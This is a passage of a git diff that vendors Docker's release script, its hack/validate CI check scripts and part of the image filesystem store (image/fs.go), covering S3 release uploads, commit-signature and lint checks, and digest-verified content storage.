+	RELEASE_BUNDLES=(
+		test-unit
+		"${RELEASE_BUNDLES[@]}"
+		test-integration-cli
+	)
+fi
+
+VERSION=$(< VERSION)
+BUCKET=$AWS_S3_BUCKET
+BUCKET_PATH=$BUCKET
+[[ -n "$AWS_S3_BUCKET_PATH" ]] && BUCKET_PATH+=/$AWS_S3_BUCKET_PATH
+
+if command -v git &> /dev/null && git rev-parse &> /dev/null; then
+	if [ -n "$(git status --porcelain --untracked-files=no)" ]; then
+		echo "You cannot run the release script on a repo with uncommitted changes"
+		usage
+	fi
+fi
+
+# These are the 2 keys we've used to sign the deb's
+#   release (get.docker.com)
+#	GPG_KEY="36A1D7869245C8950F966E92D8576A8BA88D21E9"
+#   test    (test.docker.com)
+#	GPG_KEY="740B314AE3941731B942C66ADF4FD13717AAD7D6"
+
+setup_s3() {
+	echo "Setting up S3"
+	# Try creating the bucket. Ignore errors (it might already exist).
+	$AWS_CLI s3 mb "s3://$BUCKET" 2>/dev/null || true
+	# Check access to the bucket.
+	$AWS_CLI s3 ls "s3://$BUCKET" >/dev/null
+	# Make the bucket accessible through website endpoints.
+	$AWS_CLI s3 website --index-document index --error-document error "s3://$BUCKET"
+}
+
+# write_to_s3 uploads the contents of standard input to the specified S3 url.
+write_to_s3() {
+	DEST=$1
+	F=`mktemp`
+	cat > "$F"
+	$AWS_CLI s3 cp --acl public-read --content-type 'text/plain' "$F" "$DEST"
+	rm -f "$F"
+}
+
+s3_url() {
+	case "$BUCKET" in
+		get.docker.com|test.docker.com|experimental.docker.com)
+			echo "https://$BUCKET_PATH"
+			;;
+		*)
+			BASE_URL="http://${BUCKET}.s3-website-${AWS_DEFAULT_REGION}.amazonaws.com"
+			if [[ -n "$AWS_S3_BUCKET_PATH" ]] ; then
+				echo "$BASE_URL/$AWS_S3_BUCKET_PATH"
+			else
+				echo "$BASE_URL"
+			fi
+			;;
+	esac
+}
+
+build_all() {
+	echo "Building release"
+	if ! ./hack/make.sh "${RELEASE_BUNDLES[@]}"; then
+		echo >&2
+		echo >&2 'The build or tests appear to have failed.'
+		echo >&2
+		echo >&2 'You, as the release  maintainer, now have a couple options:'
+		echo >&2 '- delay release and fix issues'
+		echo >&2 '- delay release and fix issues'
+		echo >&2 '- did we mention how important this is?  issues need fixing :)'
+		echo >&2
+		echo >&2 'As a final LAST RESORT, you (because only you, the release maintainer,'
+		echo >&2 ' really knows all the hairy problems at hand with the current release'
+		echo >&2 ' issues) may bypass this checking by running this script again with the'
+		echo >&2 ' single argument of "--release-regardless-of-test-failure", which will skip'
+		echo >&2 ' running the test suite, and will only build the binaries and packages.  Please'
+		echo >&2 ' avoid using this if at all possible.'
+		echo >&2
+		echo >&2 'Regardless, we cannot stress enough the scarcity with which this bypass'
+		echo >&2 ' should be used.  If there are release issues, we should always err on the'
+		echo >&2 ' side of caution.'
+		echo >&2
+		exit 1
+	fi
+}
+
+upload_release_build() {
+	src="$1"
+	dst="$2"
+	latest="$3"
+
+	echo
+	echo "Uploading $src"
+	echo "  to $dst"
+	echo
+	$AWS_CLI s3 cp --follow-symlinks --acl public-read "$src" "$dst"
+	if [ "$latest" ]; then
+		echo
+		echo "Copying to $latest"
+		echo
+		$AWS_CLI s3 cp --acl public-read "$dst" "$latest"
+	fi
+
+	# get hash files too (see hash_files() in hack/make.sh)
+	for hashAlgo in md5 sha256; do
+		if [ -e "$src.$hashAlgo" ]; then
+			echo
+			echo "Uploading $src.$hashAlgo"
+			echo "  to $dst.$hashAlgo"
+			echo
+			$AWS_CLI s3 cp --follow-symlinks --acl public-read --content-type='text/plain' "$src.$hashAlgo" "$dst.$hashAlgo"
+			if [ "$latest" ]; then
+				echo
+				echo "Copying to $latest.$hashAlgo"
+				echo
+				$AWS_CLI s3 cp --acl public-read "$dst.$hashAlgo" "$latest.$hashAlgo"
+			fi
+		fi
+	done
+}
+
+release_build() {
+	echo "Releasing binaries"
+	GOOS=$1
+	GOARCH=$2
+
+	binDir=bundles/$VERSION/cross/$GOOS/$GOARCH
+	tgzDir=bundles/$VERSION/tgz/$GOOS/$GOARCH
+	binary=docker-$VERSION
+	zipExt=".tgz"
+	binaryExt=""
+	tgz=$binary$zipExt
+
+	latestBase=
+	if [ -z "$NOLATEST" ]; then
+		latestBase=docker-latest
+	fi
+
+	# we need to map our GOOS and GOARCH to uname values
+	# see https://en.wikipedia.org/wiki/Uname
+	# ie, GOOS=linux -> "uname -s"=Linux
+
+	s3Os=$GOOS
+	case "$s3Os" in
+		darwin)
+			s3Os=Darwin
+			;;
+		freebsd)
+			s3Os=FreeBSD
+			;;
+		linux)
+			s3Os=Linux
+			;;
+		solaris)
+			echo skipping solaris release
+			return 0
+			;;
+		windows)
+			# this is windows use the .zip and .exe extensions for the files.
+			s3Os=Windows
+			zipExt=".zip"
+			binaryExt=".exe"
+			tgz=$binary$zipExt
+			binary+=$binaryExt
+			;;
+		*)
+			echo >&2 "error: can't convert $s3Os to an appropriate value for 'uname -s'"
+			exit 1
+			;;
+	esac
+
+	s3Arch=$GOARCH
+	case "$s3Arch" in
+		amd64)
+			s3Arch=x86_64
+			;;
+		386)
+			s3Arch=i386
+			;;
+		arm)
+			s3Arch=armel
+			# someday, we might potentially support multiple GOARM values, in which case we might get armhf here too
+			;;
+		*)
+			echo >&2 "error: can't convert $s3Arch to an appropriate value for 'uname -m'"
+			exit 1
+			;;
+	esac
+
+	s3Dir="s3://$BUCKET_PATH/builds/$s3Os/$s3Arch"
+	# latest=
+	latestTgz=
+	if [ "$latestBase" ]; then
+		# commented out since we aren't uploading binaries right now.
+		# latest="$s3Dir/$latestBase$binaryExt"
+		# we don't include the $binaryExt because we don't want docker.exe.zip
+		latestTgz="$s3Dir/$latestBase$zipExt"
+	fi
+
+	if [ ! -f "$tgzDir/$tgz" ]; then
+		echo >&2 "error: can't find $tgzDir/$tgz - was it packaged properly?"
+		exit 1
+	fi
+	# disable binary uploads for now. Only providing tgz downloads
+	# upload_release_build "$binDir/$binary" "$s3Dir/$binary" "$latest"
+	upload_release_build "$tgzDir/$tgz" "$s3Dir/$tgz" "$latestTgz"
+}
+
+# Upload binaries and tgz files to S3
+release_binaries() {
+	[ "$(find bundles/$VERSION -path "bundles/$VERSION/cross/*/*/docker-$VERSION")" != "" ] || {
+		echo >&2 './hack/make.sh must be run before release_binaries'
+		exit 1
+	}
+
+	for d in bundles/$VERSION/cross/*/*; do
+		GOARCH="$(basename "$d")"
+		GOOS="$(basename "$(dirname "$d")")"
+		release_build "$GOOS" "$GOARCH"
+	done
+
+	# TODO create redirect from builds/*/i686 to builds/*/i386
+
+	cat <<EOF | write_to_s3 s3://$BUCKET_PATH/builds/index
+# To install, run the following commands as root:
+curl -fsSLO $(s3_url)/builds/Linux/x86_64/docker-$VERSION.tgz && tar --strip-components=1 -xvzf docker-$VERSION.tgz -C /usr/local/bin
+
+# Then start docker in daemon mode:
+/usr/local/bin/dockerd
+EOF
+
+	# Add redirect at /builds/info for URL-backwards-compatibility
+	rm -rf /tmp/emptyfile && touch /tmp/emptyfile
+	$AWS_CLI s3 cp --acl public-read --website-redirect '/builds/' --content-type='text/plain' /tmp/emptyfile "s3://$BUCKET_PATH/builds/info"
+
+	if [ -z "$NOLATEST" ]; then
+		echo "Advertising $VERSION on $BUCKET_PATH as most recent version"
+		echo "$VERSION" | write_to_s3 "s3://$BUCKET_PATH/latest"
+	fi
+}
+
+# Upload the index script
+release_index() {
+	echo "Releasing index"
+	url="$(s3_url)/" hack/make.sh install-script
+	write_to_s3 "s3://$BUCKET_PATH/index" < "bundles/$VERSION/install-script/install.sh"
+}
+
+main() {
+	[ "$SKIP_RELEASE_BUILD" -eq 1 ] || build_all
+	setup_s3
+	release_binaries
+	release_index
+}
+
+main
+
+echo
+echo
+echo "Release complete; see $(s3_url)"
+echo "Use the following text to announce the release:"
+echo
+echo "We have just pushed $VERSION to $(s3_url). You can download it with the following:"
+echo
+echo "Linux 64bit tgz: $(s3_url)/builds/Linux/x86_64/docker-$VERSION.tgz"
+echo "Darwin/OSX 64bit client tgz: $(s3_url)/builds/Darwin/x86_64/docker-$VERSION.tgz"
+echo "Windows 64bit zip: $(s3_url)/builds/Windows/x86_64/docker-$VERSION.zip"
+echo "Windows 32bit client zip: $(s3_url)/builds/Windows/i386/docker-$VERSION.zip"
+echo
diff --git a/vendor/github.com/docker/docker/hack/validate/.swagger-yamllint b/vendor/github.com/docker/docker/hack/validate/.swagger-yamllint
new file mode 100644
index 0000000000..2f00cb666c
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/.swagger-yamllint
@@ -0,0 +1,4 @@
+extends: default
+rules:
+  document-start: disable
+  line-length: disable
diff --git a/vendor/github.com/docker/docker/hack/validate/.validate b/vendor/github.com/docker/docker/hack/validate/.validate
new file mode 100644
index 0000000000..defa981865
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/.validate
@@ -0,0 +1,30 @@
+#!/bin/bash
+
+set -e -o pipefail
+
+if [ -z "$VALIDATE_UPSTREAM" ]; then
+	# this is kind of an expensive check, so let's not do this twice if we
+	# are running more than one validate bundlescript
+
+	VALIDATE_REPO='https://github.com/docker/docker.git'
+	VALIDATE_BRANCH='master'
+
+	VALIDATE_HEAD="$(git rev-parse --verify HEAD)"
+
+	git fetch -q "$VALIDATE_REPO" "refs/heads/$VALIDATE_BRANCH"
+	VALIDATE_UPSTREAM="$(git rev-parse --verify FETCH_HEAD)"
+
+	VALIDATE_COMMIT_LOG="$VALIDATE_UPSTREAM..$VALIDATE_HEAD"
+	VALIDATE_COMMIT_DIFF="$VALIDATE_UPSTREAM...$VALIDATE_HEAD"
+
+	validate_diff() {
+		if [ "$VALIDATE_UPSTREAM" != "$VALIDATE_HEAD" ]; then
+			git diff "$VALIDATE_COMMIT_DIFF" "$@"
+		fi
+	}
+	validate_log() {
+		if [ "$VALIDATE_UPSTREAM" != "$VALIDATE_HEAD" ]; then
+			git log "$VALIDATE_COMMIT_LOG" "$@"
+		fi
+	}
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/all b/vendor/github.com/docker/docker/hack/validate/all
new file mode 100755
index 0000000000..308af47263
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/all
@@ -0,0 +1,8 @@
+#!/bin/bash
+#
+# Run all validation
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+
+. $SCRIPTDIR/default
+. $SCRIPTDIR/vendor
diff --git a/vendor/github.com/docker/docker/hack/validate/compose-bindata b/vendor/github.com/docker/docker/hack/validate/compose-bindata
new file mode 100755
index 0000000000..f87728259e
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/compose-bindata
@@ -0,0 +1,28 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'cli/compose/schema/data' || true) )
+unset IFS
+
+if [ ${#files[@]} -gt 0 ]; then
+	go generate github.com/docker/docker/cli/compose/schema 2> /dev/null
+	# Let see if the working directory is clean
+	diffs="$(git status --porcelain -- cli/compose/schema 2>/dev/null)"
+	if [ "$diffs" ]; then
+		{
+			echo 'The result of `go generate github.com/docker/docker/cli/compose/schema` differs'
+			echo
+			echo "$diffs"
+			echo
+			echo 'Please run `go generate github.com/docker/docker/cli/compose/schema`'
+		} >&2
+		false
+	else
+		echo 'Congratulations! cli/compose/schema/bindata.go is up-to-date.'
+	fi
+else
+    echo 'No cli/compose/schema/data changes in diff.'
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/dco b/vendor/github.com/docker/docker/hack/validate/dco
new file mode 100755
index 0000000000..754ce8faec
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/dco
@@ -0,0 +1,55 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+adds=$(validate_diff --numstat | awk '{ s += $1 } END { print s }')
+dels=$(validate_diff --numstat | awk '{ s += $2 } END { print s }')
+#notDocs="$(validate_diff --numstat | awk '$3 !~ /^docs\// { print $3 }')"
+
+: ${adds:=0}
+: ${dels:=0}
+
+# "Username may only contain alphanumeric characters or dashes and cannot begin with a dash"
+githubUsernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+'
+
+# https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work
+dcoPrefix='Signed-off-by:'
+dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($githubUsernameRegex)\\))?$"
+
+check_dco() {
+	grep -qE "$dcoRegex"
+}
+
+if [ $adds -eq 0 -a $dels -eq 0 ]; then
+	echo '0 adds, 0 deletions; nothing to validate! :)'
+else
+	commits=( $(validate_log --format='format:%H%n') )
+	badCommits=()
+	for commit in "${commits[@]}"; do
+		if [ -z "$(git log -1 --format='format:' --name-status "$commit")" ]; then
+			# no content (ie, Merge commit, etc)
+			continue
+		fi
+		if ! git log -1 --format='format:%B' "$commit" | check_dco; then
+			badCommits+=( "$commit" )
+		fi
+	done
+	if [ ${#badCommits[@]} -eq 0 ]; then
+		echo "Congratulations!  All commits are properly signed with the DCO!"
+	else
+		{
+			echo "These commits do not have a proper '$dcoPrefix' marker:"
+			for commit in "${badCommits[@]}"; do
+				echo " - $commit"
+			done
+			echo
+			echo 'Please amend each commit to include a properly formatted DCO marker.'
+			echo
+			echo 'Visit the following URL for information about the Docker DCO:'
+			echo ' https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work'
+			echo
+		} >&2
+		false
+	fi
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/default b/vendor/github.com/docker/docker/hack/validate/default
new file mode 100755
index 0000000000..29b96ca9a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/default
@@ -0,0 +1,16 @@
+#!/bin/bash
+#
+# Run default validation, exclude vendor because it's slow
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+
+. $SCRIPTDIR/dco
+. $SCRIPTDIR/default-seccomp
+. $SCRIPTDIR/gofmt
+. $SCRIPTDIR/lint
+. $SCRIPTDIR/pkg-imports
+. $SCRIPTDIR/swagger
+. $SCRIPTDIR/swagger-gen
+. $SCRIPTDIR/test-imports
+. $SCRIPTDIR/toml
+. $SCRIPTDIR/vet
diff --git a/vendor/github.com/docker/docker/hack/validate/default-seccomp b/vendor/github.com/docker/docker/hack/validate/default-seccomp
new file mode 100755
index 0000000000..8fe8435618
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/default-seccomp
@@ -0,0 +1,28 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'profiles/seccomp' || true) )
+unset IFS
+
+if [ ${#files[@]} -gt 0 ]; then
+	# We run 'go generate' and see if we have a diff afterwards
+	go generate ./profiles/seccomp/ >/dev/null
+	# Let see if the working directory is clean
+	diffs="$(git status --porcelain -- profiles/seccomp 2>/dev/null)"
+	if [ "$diffs" ]; then
+		{
+			echo 'The result of go generate ./profiles/seccomp/ differs'
+			echo
+			echo "$diffs"
+			echo
+			echo 'Please re-run go generate ./profiles/seccomp/'
+			echo
+		} >&2
+		false
+	else
+		echo 'Congratulations! Seccomp profile generation is done correctly.'
+	fi
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/gofmt b/vendor/github.com/docker/docker/hack/validate/gofmt
new file mode 100755
index 0000000000..2040afa09e
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/gofmt
@@ -0,0 +1,33 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' |
+    grep -v '^vendor/' |
+    grep -v '^cli/compose/schema/bindata.go' || true) )
+unset IFS
+
+badFiles=()
+for f in "${files[@]}"; do
+	# we use "git show" here to validate that what's committed is formatted
+	if [ "$(git show "$VALIDATE_HEAD:$f" | gofmt -s -l)" ]; then
+		badFiles+=( "$f" )
+	fi
+done
+
+if [ ${#badFiles[@]} -eq 0 ]; then
+	echo 'Congratulations!  All Go source files are properly formatted.'
+else
+	{
+		echo "These files are not properly gofmt'd:"
+		for f in "${badFiles[@]}"; do
+			echo " - $f"
+		done
+		echo
+		echo 'Please reformat the above files using "gofmt -s -w" and commit the result.'
+		echo
+	} >&2
+	false
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/lint b/vendor/github.com/docker/docker/hack/validate/lint
new file mode 100755
index 0000000000..4ac0a33b20
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/lint
@@ -0,0 +1,31 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' | grep -v '^cli/compose/schema/bindata.go' || true) )
+unset IFS
+
+errors=()
+for f in "${files[@]}"; do
+	failedLint=$(golint "$f")
+	if [ "$failedLint" ]; then
+		errors+=( "$failedLint" )
+	fi
+done
+
+if [ ${#errors[@]} -eq 0 ]; then
+	echo 'Congratulations!  All Go source files have been linted.'
+else
+	{
+		echo "Errors from golint:"
+		for err in "${errors[@]}"; do
+			echo "$err"
+		done
+		echo
+		echo 'Please fix the above errors. You can test via "golint" and commit the result.'
+		echo
+	} >&2
+	false
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/pkg-imports b/vendor/github.com/docker/docker/hack/validate/pkg-imports
new file mode 100755
index 0000000000..9e4ea74da0
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/pkg-imports
@@ -0,0 +1,33 @@
+#!/bin/bash
+set -e
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'pkg/*.go' || true) )
+unset IFS
+
+badFiles=()
+for f in "${files[@]}"; do
+	IFS=$'\n'
+	badImports=( $(go list -e -f '{{ join .Deps "\n" }}' "$f" | sort -u | grep -vE '^github.com/docker/docker/pkg/' | grep -vE '^github.com/docker/docker/vendor' | grep -E '^github.com/docker/docker' || true) )
+	unset IFS
+
+	for import in "${badImports[@]}"; do
+		badFiles+=( "$f imports $import" )
+	done
+done
+
+if [ ${#badFiles[@]} -eq 0 ]; then
+	echo 'Congratulations!  "./pkg/..." is safely isolated from internal code.'
+else
+	{
+		echo 'These files import internal code: (either directly or indirectly)'
+		for f in "${badFiles[@]}"; do
+			echo " - $f"
+		done
+		echo
+	} >&2
+	false
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/swagger b/vendor/github.com/docker/docker/hack/validate/swagger
new file mode 100755
index 0000000000..e754fb8cb9
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/swagger
@@ -0,0 +1,13 @@
+#!/bin/bash
+set -e
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'api/swagger.yaml' || true) )
+unset IFS
+
+if [ ${#files[@]} -gt 0 ]; then
+  yamllint -c ${SCRIPTDIR}/.swagger-yamllint api/swagger.yaml
+  swagger validate api/swagger.yaml
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/swagger-gen b/vendor/github.com/docker/docker/hack/validate/swagger-gen
new file mode 100755
index 0000000000..008abc7e0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/swagger-gen
@@ -0,0 +1,29 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'api/types/' 'api/swagger.yaml' || true) )
+unset IFS
+
+if [ ${#files[@]} -gt 0 ]; then
+	${SCRIPTDIR}/../generate-swagger-api.sh 2> /dev/null
+	# Let see if the working directory is clean
+	diffs="$(git status --porcelain -- api/types/ 2>/dev/null)"
+	if [ "$diffs" ]; then
+		{
+			echo 'The result of hack/generate-swagger-api.sh differs'
+			echo
+			echo "$diffs"
+			echo
+			echo 'Please update api/swagger.yaml with any api changes, then '
+			echo 'run `hack/generate-swagger-api.sh`.'
+		} >&2
+		false
+	else
+		echo 'Congratulations! All api changes are done the right way.'
+	fi
+else
+    echo 'No api/types/ or api/swagger.yaml changes in diff.'
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/test-imports b/vendor/github.com/docker/docker/hack/validate/test-imports
new file mode 100755
index 0000000000..373caa2f29
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/test-imports
@@ -0,0 +1,38 @@
+#!/bin/bash
+# Make sure we're not using gos' Testing package any more in integration-cli
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'integration-cli/*.go' || true) )
+unset IFS
+
+badFiles=()
+for f in "${files[@]}"; do
+	# skip check_test.go since it *does* use the testing package
+	if [ "$f" = "integration-cli/check_test.go" ]; then
+		continue
+	fi
+
+	# we use "git show" here to validate that what's committed doesn't contain golang built-in testing
+	if git show "$VALIDATE_HEAD:$f" | grep -q testing.T; then
+		if [ "$(echo $f | grep '_test')" ]; then
+			# allow testing.T for non- _test files
+			badFiles+=( "$f" )
+		fi
+	fi
+done
+
+if [ ${#badFiles[@]} -eq 0 ]; then
+	echo 'Congratulations!  No testing.T found.'
+else
+	{
+		echo "These files use the wrong testing infrastructure:"
+		for f in "${badFiles[@]}"; do
+			echo " - $f"
+		done
+		echo
+	} >&2
+	false
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/toml b/vendor/github.com/docker/docker/hack/validate/toml
new file mode 100755
index 0000000000..a0cb158dbd
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/toml
@@ -0,0 +1,31 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'MAINTAINERS' || true) )
+unset IFS
+
+badFiles=()
+for f in "${files[@]}"; do
+	# we use "git show" here to validate that what's committed has valid toml syntax
+	if ! git show "$VALIDATE_HEAD:$f" | tomlv /proc/self/fd/0 ; then
+		badFiles+=( "$f" )
+	fi
+done
+
+if [ ${#badFiles[@]} -eq 0 ]; then
+	echo 'Congratulations!  All toml source files changed here have valid syntax.'
+else
+	{
+		echo "These files are not valid toml:"
+		for f in "${badFiles[@]}"; do
+			echo " - $f"
+		done
+		echo
+		echo 'Please reformat the above files as valid toml'
+		echo
+	} >&2
+	false
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/vendor b/vendor/github.com/docker/docker/hack/validate/vendor
new file mode 100755
index 0000000000..0cb5aabdfa
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/vendor
@@ -0,0 +1,30 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) 
+unset IFS
+
+if [ ${#files[@]} -gt 0 ]; then
+	# We run vndr to and see if we have a diff afterwards
+	vndr
+	# Let see if the working directory is clean
+	diffs="$(git status --porcelain -- vendor 2>/dev/null)"
+	if [ "$diffs" ]; then
+		{
+			echo 'The result of vndr differs'
+			echo
+			echo "$diffs"
+			echo
+			echo 'Please vendor your package with github.com/LK4D4/vndr.'
+			echo
+		} >&2
+		false
+	else
+		echo 'Congratulations! All vendoring changes are done the right way.'
+	fi
+else
+    echo 'No vendor changes in diff.'
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/vet b/vendor/github.com/docker/docker/hack/validate/vet
new file mode 100755
index 0000000000..64760489ea
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/vet
@@ -0,0 +1,32 @@
+#!/bin/bash
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+IFS=$'\n'
+files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' || true) )
+unset IFS
+
+errors=()
+for f in "${files[@]}"; do
+	failedVet=$(go vet "$f")
+	if [ "$failedVet" ]; then
+		errors+=( "$failedVet" )
+	fi
+done
+
+
+if [ ${#errors[@]} -eq 0 ]; then
+	echo 'Congratulations!  All Go source files have been vetted.'
+else
+	{
+		echo "Errors from go vet:"
+		for err in "${errors[@]}"; do
+			echo " - $err"
+		done
+		echo
+		echo 'Please fix the above errors. You can test via "go vet" and commit the result.'
+		echo
+	} >&2
+	false
+fi
diff --git a/vendor/github.com/docker/docker/hack/vendor.sh b/vendor/github.com/docker/docker/hack/vendor.sh
new file mode 100755
index 0000000000..9a4d038539
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/vendor.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+
+# This file is just wrapper around vndr (github.com/LK4D4/vndr) tool.
+# For updating dependencies you should change `vendor.conf` file in root of the
+# project. Please refer to https://github.com/LK4D4/vndr/blob/master/README.md for
+# vndr usage.
+
+set -e
+
+if ! hash vndr; then
+	echo "Please install vndr with \"go get github.com/LK4D4/vndr\" and put it in your \$GOPATH"
+	exit 1
+fi
+
+vndr "$@"
diff --git a/vendor/github.com/docker/docker/image/fs.go b/vendor/github.com/docker/docker/image/fs.go
new file mode 100644
index 0000000000..39cfbf5d74
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/fs.go
@@ -0,0 +1,173 @@
+package image
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+// DigestWalkFunc is function called by StoreBackend.Walk
+type DigestWalkFunc func(id digest.Digest) error
+
+// StoreBackend provides interface for image.Store persistence
+type StoreBackend interface {
+	Walk(f DigestWalkFunc) error
+	Get(id digest.Digest) ([]byte, error)
+	Set(data []byte) (digest.Digest, error)
+	Delete(id digest.Digest) error
+	SetMetadata(id digest.Digest, key string, data []byte) error
+	GetMetadata(id digest.Digest, key string) ([]byte, error)
+	DeleteMetadata(id digest.Digest, key string) error
+}
+
+// fs implements StoreBackend using the filesystem.
+type fs struct {
+	sync.RWMutex
+	root string
+}
+
+const (
+	contentDirName  = "content"
+	metadataDirName = "metadata"
+)
+
+// NewFSStoreBackend returns new filesystem based backend for image.Store
+func NewFSStoreBackend(root string) (StoreBackend, error) {
+	return newFSStore(root)
+}
+
+func newFSStore(root string) (*fs, error) {
+	s := &fs{
+		root: root,
+	}
+	if err := os.MkdirAll(filepath.Join(root, contentDirName, string(digest.Canonical)), 0700); err != nil {
+		return nil, err
+	}
+	if err := os.MkdirAll(filepath.Join(root, metadataDirName, string(digest.Canonical)), 0700); err != nil {
+		return nil, err
+	}
+	return s, nil
+}
+
+func (s *fs) contentFile(dgst digest.Digest) string {
+	return filepath.Join(s.root, contentDirName, string(dgst.Algorithm()), dgst.Hex())
+}
+
+func (s *fs) metadataDir(dgst digest.Digest) string {
+	return filepath.Join(s.root, metadataDirName, string(dgst.Algorithm()), dgst.Hex())
+}
+
+// Walk calls the supplied callback for each image ID in the storage backend.
+func (s *fs) Walk(f DigestWalkFunc) error {
+	// Only Canonical digest (sha256) is currently supported
+	s.RLock()
+	dir, err := ioutil.ReadDir(filepath.Join(s.root, contentDirName, string(digest.Canonical)))
+	s.RUnlock()
+	if err != nil {
+		return err
+	}
+	for _, v := range dir {
+		dgst := digest.NewDigestFromHex(string(digest.Canonical), v.Name())
+		if err := dgst.Validate(); err != nil {
+			logrus.Debugf("Skipping invalid digest %s: %s", dgst, err)
+			continue
+		}
+		if err := f(dgst); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// Get returns the content stored under a given digest.
+func (s *fs) Get(dgst digest.Digest) ([]byte, error) {
+	s.RLock()
+	defer s.RUnlock()
+
+	return s.get(dgst)
+}
+
+func (s *fs) get(dgst digest.Digest) ([]byte, error) {
+	content, err := ioutil.ReadFile(s.contentFile(dgst))
+	if err != nil {
+		return nil, err
+	}
+
+	// todo: maybe optional
+	if digest.FromBytes(content) != dgst {
+		return nil, fmt.Errorf("failed to verify: %v", dgst)
+	}
+
+	return content, nil
+}
+
+// Set stores content by checksum.
+func (s *fs) Set(data []byte) (digest.Digest, error) {
+	s.Lock()
+	defer s.Unlock()
+
+	if len(data) == 0 {
+		return "", fmt.Errorf("Invalid empty data")
+	}
+
+	dgst := digest.FromBytes(data)
+	if err := ioutils.AtomicWriteFile(s.contentFile(dgst), data, 0600); err != nil {
+		return "", err
+	}
+
+	return dgst, nil
+}
+
